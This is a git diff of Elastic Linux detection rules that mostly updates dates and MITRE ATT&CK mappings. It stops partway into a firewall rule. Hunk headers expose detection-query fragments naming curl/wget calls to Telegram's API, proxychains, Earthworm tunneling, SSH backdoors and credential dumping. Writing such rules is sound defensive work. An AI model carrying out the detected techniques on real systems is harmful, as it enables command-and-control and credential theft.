a/rules/linux/command_and_control_linux_kworker_netcon.toml b/rules/linux/command_and_control_linux_kworker_netcon.toml index acd204dae9a..2895259e81d 100644 --- a/rules/linux/command_and_control_linux_kworker_netcon.toml +++ b/rules/linux/command_and_control_linux_kworker_netcon.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/18" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/24" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -128,6 +128,11 @@ id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique.subtechnique]] +id = "T1036.004" +name = "Masquerade Task or Service" +reference = "https://attack.mitre.org/techniques/T1036/004/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" @@ -145,7 +150,6 @@ reference = "https://attack.mitre.org/techniques/T1041/" id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" - [rule.new_terms] field = "new_terms_fields" value = ["process.name", "host.id"] diff --git a/rules/linux/command_and_control_linux_proxychains_activity.toml b/rules/linux/command_and_control_linux_proxychains_activity.toml index c86530e3580..409f98fe875 100644 --- a/rules/linux/command_and_control_linux_proxychains_activity.toml +++ b/rules/linux/command_and_control_linux_proxychains_activity.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/23" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -139,6 +139,16 @@ process.name == "proxychains" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" + +[[rule.threat.technique.subtechnique]] +id = "T1090.003" +name = "Multi-hop Proxy" +reference = "https://attack.mitre.org/techniques/T1090/003/" + [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" diff --git a/rules/linux/command_and_control_linux_ssh_x11_forwarding.toml b/rules/linux/command_and_control_linux_ssh_x11_forwarding.toml index b4d383c26e2..8cc7c5858d7 100644 --- a/rules/linux/command_and_control_linux_ssh_x11_forwarding.toml +++ b/rules/linux/command_and_control_linux_ssh_x11_forwarding.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/23" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -134,14 +134,31 @@ process.parent.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" reference = "https://attack.mitre.org/techniques/T1572/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.004" +name = "SSH" +reference = "https://attack.mitre.org/techniques/T1021/004/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/linux/command_and_control_linux_suspicious_proxychains_activity.toml b/rules/linux/command_and_control_linux_suspicious_proxychains_activity.toml index 6af65daf2cc..12dfb33d13d 100644 --- a/rules/linux/command_and_control_linux_suspicious_proxychains_activity.toml +++ b/rules/linux/command_and_control_linux_suspicious_proxychains_activity.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/23" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -169,6 +169,16 @@ process.name == "proxychains" and process.args : ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" + +[[rule.threat.technique.subtechnique]] +id = "T1090.003" +name = "Multi-hop Proxy" +reference = "https://attack.mitre.org/techniques/T1090/003/" + [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" diff --git a/rules/linux/command_and_control_linux_tunneling_and_port_forwarding.toml b/rules/linux/command_and_control_linux_tunneling_and_port_forwarding.toml index a32949a8673..6bccac5ae54 100644 --- a/rules/linux/command_and_control_linux_tunneling_and_port_forwarding.toml +++ b/rules/linux/command_and_control_linux_tunneling_and_port_forwarding.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/23" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2026/02/20" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -193,6 +193,21 @@ process where host.os.type == "linux" and event.type == "start" and event.action [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[[rule.threat.technique.subtechnique]] +id = "T1071.004" +name = "DNS" +reference = "https://attack.mitre.org/techniques/T1071/004/" + +[[rule.threat.technique]] +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" + [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" diff --git a/rules/linux/command_and_control_linux_tunneling_via_ssh_option.toml b/rules/linux/command_and_control_linux_tunneling_via_ssh_option.toml index 971d4da2b10..7125dd7bc96 100644 --- a/rules/linux/command_and_control_linux_tunneling_via_ssh_option.toml +++ b/rules/linux/command_and_control_linux_tunneling_via_ssh_option.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/25" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/02/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -118,6 +118,11 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" + [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" diff --git a/rules/linux/command_and_control_potential_tunneling_command_line.toml b/rules/linux/command_and_control_potential_tunneling_command_line.toml index f0209e6a64a..075f98f32fd 100644 --- a/rules/linux/command_and_control_potential_tunneling_command_line.toml +++ b/rules/linux/command_and_control_potential_tunneling_command_line.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/12" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2025/12/12" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -170,6 +170,11 @@ process.command_line regex """.*[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}:[ [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" + [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" diff --git a/rules/linux/command_and_control_suspicious_network_activity_from_unknown_executable.toml b/rules/linux/command_and_control_suspicious_network_activity_from_unknown_executable.toml index a89abcbc982..a50b571510c 100644 --- a/rules/linux/command_and_control_suspicious_network_activity_from_unknown_executable.toml +++ b/rules/linux/command_and_control_suspicious_network_activity_from_unknown_executable.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/14" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/03" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -219,6 +219,33 @@ id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" + +[[rule.threat.technique.subtechnique]] +id = "T1037.004" +name = "RC Scripts" +reference = "https://attack.mitre.org/techniques/T1037/004/" + +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" + +[[rule.threat.technique.subtechnique]] +id = "T1053.003" +name = "Cron" +reference = "https://attack.mitre.org/techniques/T1053/003/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules/linux/command_and_control_telegram_api_request.toml b/rules/linux/command_and_control_telegram_api_request.toml index 7c6867e61ea..ee1d8633459 100644 --- a/rules/linux/command_and_control_telegram_api_request.toml +++ b/rules/linux/command_and_control_telegram_api_request.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/29" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -120,17 +120,27 @@ process.name in ("curl", "wget") and process.command_line like "*api.telegram.or [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" - - [[rule.threat.technique]] - name = "Application Layer Protocol" - id = "T1071" - reference = "https://attack.mitre.org/techniques/T1071/" - - [[rule.threat.technique.subtechnique]] - name = "Web Protocols" - id = "T1071.001" - reference = "https://attack.mitre.org/techniques/T1071/001/" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" + +[[rule.threat.technique]] +id = "T1102" +name = "Web Service" +reference = "https://attack.mitre.org/techniques/T1102/" + +[[rule.threat.technique.subtechnique]] +id = "T1102.002" +name = "Bidirectional Communication" +reference = "https://attack.mitre.org/techniques/T1102/002/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/command_and_control_tunneling_via_earthworm.toml b/rules/linux/command_and_control_tunneling_via_earthworm.toml index be519817da2..4146d2eb91d 100644 --- a/rules/linux/command_and_control_tunneling_via_earthworm.toml +++ b/rules/linux/command_and_control_tunneling_via_earthworm.toml @@ -2,7 +2,7 @@ creation_date = "2021/04/12" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -177,6 +177,11 @@ process.args : "-s" and process.args : "-d" and process.args : "rssocks" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" + [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" diff --git a/rules/linux/credential_access_aws_creds_search_inside_container.toml b/rules/linux/credential_access_aws_creds_search_inside_container.toml index 77439cd442d..809b7166137 100644 --- a/rules/linux/credential_access_aws_creds_search_inside_container.toml +++ b/rules/linux/credential_access_aws_creds_search_inside_container.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/12" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -116,3 +116,29 @@ reference = "https://attack.mitre.org/techniques/T1552/001/" id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/linux/credential_access_collection_sensitive_files.toml b/rules/linux/credential_access_collection_sensitive_files.toml index 71d52ec71c9..537425e980b 100644 --- a/rules/linux/credential_access_collection_sensitive_files.toml +++ b/rules/linux/credential_access_collection_sensitive_files.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/22" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -171,6 +171,11 @@ reference = "https://attack.mitre.org/tactics/TA0006/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" + [[rule.threat.technique]] id = "T1560" name = "Archive Collected Data" @@ -185,7 +190,6 @@ reference = "https://attack.mitre.org/techniques/T1560/001/" id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" - [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.command_line", "process.parent.executable"] diff --git a/rules/linux/credential_access_collection_sensitive_files_compression_inside_container.toml b/rules/linux/credential_access_collection_sensitive_files_compression_inside_container.toml index 417321d89b0..160f0356f1d 100644 --- a/rules/linux/credential_access_collection_sensitive_files_compression_inside_container.toml +++ b/rules/linux/credential_access_collection_sensitive_files_compression_inside_container.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/12" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -119,6 +119,11 @@ reference = "https://attack.mitre.org/tactics/TA0006/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" + [[rule.threat.technique]] id = "T1560" name = "Archive Collected Data" diff --git a/rules/linux/credential_access_credential_dumping.toml b/rules/linux/credential_access_credential_dumping.toml index 777c602f05e..4b773d25664 100644 --- a/rules/linux/credential_access_credential_dumping.toml +++ b/rules/linux/credential_access_credential_dumping.toml @@ -2,7 +2,7 @@ creation_date = "2023/02/27" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -121,3 +121,16 @@ reference = "https://attack.mitre.org/techniques/T1003/008/" id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/linux/credential_access_gdb_init_process_hooking.toml b/rules/linux/credential_access_gdb_init_process_hooking.toml index 646c05881fc..fe09ce66225 100644 --- a/rules/linux/credential_access_gdb_init_process_hooking.toml +++ b/rules/linux/credential_access_gdb_init_process_hooking.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/30" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -122,3 +122,16 @@ reference = "https://attack.mitre.org/techniques/T1003/007/" id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/linux/credential_access_gdb_process_hooking.toml b/rules/linux/credential_access_gdb_process_hooking.toml index af461be6f71..a8d9e3c988d 100644 --- a/rules/linux/credential_access_gdb_process_hooking.toml +++ b/rules/linux/credential_access_gdb_process_hooking.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/30" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -87,19 +87,36 @@ process.args != "1" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" + [[rule.threat.technique.subtechnique]] id = "T1003.007" name = "Proc Filesystem" reference = "https://attack.mitre.org/techniques/T1003/007/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" + +[[rule.threat.technique.subtechnique]] +id = "T1055.008" +name = "Ptrace System Calls" +reference = "https://attack.mitre.org/techniques/T1055/008/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/credential_access_gh_auth_via_nodejs.toml b/rules/linux/credential_access_gh_auth_via_nodejs.toml index 1ab982a0861..0fbe0239223 100644 --- a/rules/linux/credential_access_gh_auth_via_nodejs.toml +++ b/rules/linux/credential_access_gh_auth_via_nodejs.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/18" integration = ["endpoint", "crowdstrike"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -69,16 +69,16 @@ process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1552" -name = "Unsecured Credentials" -reference = "https://attack.mitre.org/techniques/T1552/" - [[rule.threat.technique]] id = "T1528" name = "Steal Application Access Token" reference = "https://attack.mitre.org/techniques/T1528/" +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" @@ -96,3 +96,21 @@ reference = "https://attack.mitre.org/techniques/T1613/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/credential_access_kubernetes_service_account_secret_access.toml b/rules/linux/credential_access_kubernetes_service_account_secret_access.toml index b4054ccf7f8..a81e911e3b7 100644 --- a/rules/linux/credential_access_kubernetes_service_account_secret_access.toml +++ b/rules/linux/credential_access_kubernetes_service_account_secret_access.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/17" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -134,15 +134,20 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1528" +name = "Steal Application Access Token" +reference = "https://attack.mitre.org/techniques/T1528/" + [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" -[[rule.threat.technique]] -id = "T1528" -name = "Steal Application Access Token" -reference = "https://attack.mitre.org/techniques/T1528/" +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" [rule.threat.tactic] id = "TA0006" @@ -161,3 +166,16 @@ reference = "https://attack.mitre.org/techniques/T1613/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/linux/credential_access_manual_memory_dumping.toml b/rules/linux/credential_access_manual_memory_dumping.toml index d6f5ffe2135..5cfc95bc8ce 100644 --- a/rules/linux/credential_access_manual_memory_dumping.toml +++ b/rules/linux/credential_access_manual_memory_dumping.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/25" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -129,3 +129,16 @@ reference = "https://attack.mitre.org/techniques/T1212/" id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/linux/credential_access_potential_linux_ssh_bruteforce_internal.toml b/rules/linux/credential_access_potential_linux_ssh_bruteforce_internal.toml index 020628dd4f9..968fb29c84f 100644 --- a/rules/linux/credential_access_potential_linux_ssh_bruteforce_internal.toml +++ b/rules/linux/credential_access_potential_linux_ssh_bruteforce_internal.toml @@ -2,7 +2,7 @@ creation_date = "2023/02/21" integration = ["system"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -115,3 +115,21 @@ reference = "https://attack.mitre.org/techniques/T1110/003/" id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.004" +name = "SSH" +reference = "https://attack.mitre.org/techniques/T1021/004/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/linux/credential_access_potential_successful_linux_ssh_bruteforce.toml b/rules/linux/credential_access_potential_successful_linux_ssh_bruteforce.toml index 8f8c9f7c185..f49bfa664f9 100644 --- a/rules/linux/credential_access_potential_successful_linux_ssh_bruteforce.toml +++ b/rules/linux/credential_access_potential_successful_linux_ssh_bruteforce.toml @@ -2,7 +2,7 @@ creation_date = "2022/09/14" integration = ["system"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -117,3 +117,16 @@ reference = "https://attack.mitre.org/techniques/T1110/003/" id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/linux/credential_access_proc_credential_dumping.toml b/rules/linux/credential_access_proc_credential_dumping.toml index f543e3ff547..1ffd1eadd04 100644 --- a/rules/linux/credential_access_proc_credential_dumping.toml +++ b/rules/linux/credential_access_proc_credential_dumping.toml @@ -2,7 +2,7 @@ creation_date = "2023/04/26" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -131,3 +131,16 @@ reference = "https://attack.mitre.org/techniques/T1212/" id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1057" +name = "Process Discovery" +reference = "https://attack.mitre.org/techniques/T1057/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/linux/credential_access_sensitive_keys_or_passwords_search_inside_container.toml b/rules/linux/credential_access_sensitive_keys_or_passwords_search_inside_container.toml index 0b636c1f0b6..a1fe4c1add7 100644 --- a/rules/linux/credential_access_sensitive_keys_or_passwords_search_inside_container.toml +++ b/rules/linux/credential_access_sensitive_keys_or_passwords_search_inside_container.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/12" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -117,3 +117,16 @@ reference = "https://attack.mitre.org/techniques/T1552/001/" id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/linux/credential_access_ssh_backdoor_log.toml b/rules/linux/credential_access_ssh_backdoor_log.toml index 1a136471d12..90c1c3704e2 100644 --- a/rules/linux/credential_access_ssh_backdoor_log.toml +++ b/rules/linux/credential_access_ssh_backdoor_log.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/21" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -170,3 +170,21 @@ reference = "https://attack.mitre.org/techniques/T1554/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1074" +name = "Data Staged" +reference = "https://attack.mitre.org/techniques/T1074/" + +[[rule.threat.technique.subtechnique]] +id = "T1074.001" +name = "Local Data Staging" +reference = "https://attack.mitre.org/techniques/T1074/001/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/linux/credential_access_ssh_password_grabbing_via_strace.toml b/rules/linux/credential_access_ssh_password_grabbing_via_strace.toml index feb93587467..449714c3174 100644 --- a/rules/linux/credential_access_ssh_password_grabbing_via_strace.toml +++ b/rules/linux/credential_access_ssh_password_grabbing_via_strace.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/10" integration = ["endpoint"] maturity = "production" -updated_date = "2025/11/24" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -76,6 +76,11 @@ sequence by host.id with maxspan=3s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1056" +name = "Input Capture" +reference = "https://attack.mitre.org/techniques/T1056/" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" diff --git a/rules/linux/credential_access_unusual_instance_metadata_service_api_request.toml b/rules/linux/credential_access_unusual_instance_metadata_service_api_request.toml index c58ad162a18..effcb209566 100644 --- a/rules/linux/credential_access_unusual_instance_metadata_service_api_request.toml +++ b/rules/linux/credential_access_unusual_instance_metadata_service_api_request.toml @@ -2,7 +2,7 @@ creation_date = "2024/08/22" integration = ["endpoint"] maturity = "production" -updated_date = "2025/09/29" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -182,31 +182,41 @@ sequence by host.id, process.parent.entity_id with maxspan=3s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" + [[rule.threat.technique.subtechnique]] id = "T1552.005" name = "Cloud Instance Metadata API" reference = "https://attack.mitre.org/techniques/T1552/005/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1016" +name = "System Network Configuration Discovery" +reference = "https://attack.mitre.org/techniques/T1016/" + +[[rule.threat.technique]] +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" + [[rule.threat.technique]] id = "T1580" name = "Cloud Infrastructure Discovery" reference = "https://attack.mitre.org/techniques/T1580/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules/linux/defense_evasion_attempt_to_disable_auditd_service.toml b/rules/linux/defense_evasion_attempt_to_disable_auditd_service.toml index 6b076f4a605..b340bee6522 100644 --- a/rules/linux/defense_evasion_attempt_to_disable_auditd_service.toml +++ b/rules/linux/defense_evasion_attempt_to_disable_auditd_service.toml @@ -2,7 +2,7 @@ creation_date = "2024/08/28" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -123,3 +123,16 @@ reference = "https://attack.mitre.org/techniques/T1562/001/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1489" +name = "Service Stop" +reference = "https://attack.mitre.org/techniques/T1489/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/linux/defense_evasion_attempt_to_disable_iptables_or_firewall.toml b/rules/linux/defense_evasion_attempt_to_disable_iptables_or_firewall.toml index f1d091298b1..eea9e5baea5 100644 --- a/rules/linux/defense_evasion_attempt_to_disable_iptables_or_firewall.toml +++ 